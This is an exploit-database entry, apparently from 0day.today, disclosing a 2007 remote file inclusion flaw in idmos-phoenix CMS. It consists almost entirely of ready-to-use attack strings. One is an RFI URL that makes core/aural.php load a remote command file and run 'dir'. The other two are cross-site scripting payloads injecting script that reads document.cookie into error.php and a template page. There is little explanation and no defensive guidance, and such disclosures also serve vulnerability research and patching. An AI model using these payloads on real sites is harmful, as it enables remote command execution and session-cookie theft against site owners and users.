id: 2200
date: 10/06/2007
title: idmos-phoenix cms (aural.php) Remote File Inclusion Vulnerability
author: HACKERS PAL
cves: 

=================================================================
idmos-phoenix cms (aural.php) Remote File Inclusion Vulnerability
=================================================================



idmos-phoenix cms Remote File inclusion
 
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net

 
RFI
core/aural.php?site_absolute_path=http://localhost/cmd.txt?&cmd=dir
 
Xss
error.php?err_msg=<script>alert(document.cookie);</script>
templates/simple/ia.php?content=<script>alert(document.cookie);</script>



#  0day.today [2023-03-24]  #